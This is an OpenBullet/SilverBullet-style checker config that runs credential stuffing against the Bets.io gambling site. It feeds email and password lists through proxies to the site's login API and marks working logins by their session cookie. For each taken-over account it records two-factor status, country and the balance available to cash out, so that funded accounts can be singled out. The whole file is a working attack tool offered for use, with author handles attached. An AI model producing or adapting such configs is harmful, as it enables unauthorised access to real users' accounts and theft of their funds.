[SETTINGS]
{
  "Name": "Bets.io",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2024-08-01T03:33:33.3333333-07:00",
  "AdditionalInfo": "github.com/0xSums",
  "RequiredPlugins": [],
  "Author": "✧",
  "Version": "[t.me/imSums]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "Default",
  "AllowedWordlist2": "Email",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "BETS",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#SHA256 FUNCTION Hash SHA256 "<PASS>" -> VAR "SHA" 

#users/sign_in REQUEST POST "https://api.bets.io/api/users/sign_in" ReadResponseSource=FALSE 
  CONTENT "{\"user\":{\"email\":\"<USER>\",\"password\":\"<SHA>\"}}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/vnd.softswiss.v1+json" 

#Valid? KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" EqualTo "422" 
  KEYCHAIN Success OR 
    KEY "<COOKIES(_casino_session)>" Contains "eyJ" 

#api/player REQUEST GET "https://api.bets2.io/api/player" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/vnd.softswiss.v1+json" 

#2FA PARSE "<SOURCE>" LR "\"two_factor_enabled\":" "," -> VAR "2FA" 

#Country PARSE "<SOURCE>" LR "\"country\":\"" "\"" CreateEmpty=FALSE -> CAP "Country" 

#player/accounts REQUEST GET "https://api.bets2.io/api/player/accounts?compatibility=false" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/vnd.softswiss.v1+json" 

#Cashout PARSE "<SOURCE>" LR "available_to_cashout_cents\":" "," Recursive=TRUE -> VAR "Cashout" 

#$? KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<2FA>" EqualTo "true" 
    KEY "<Cashout>" EqualTo "[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]" 

!#AmountCents PARSE "<SOURCE>" LR "\"amount_cents\":" "," Recursive=TRUE CreateEmpty=FALSE -> CAP "AmountCents" 

#Cashout PARSE "<SOURCE>" LR "available_to_cashout_cents\":" "," Recursive=TRUE CreateEmpty=FALSE -> CAP "Cashout" 

!#WagerStatus PARSE "<SOURCE>" LR "wager_status\":\"" "\"" Recursive=TRUE CreateEmpty=FALSE -> CAP "WagerStatus" 

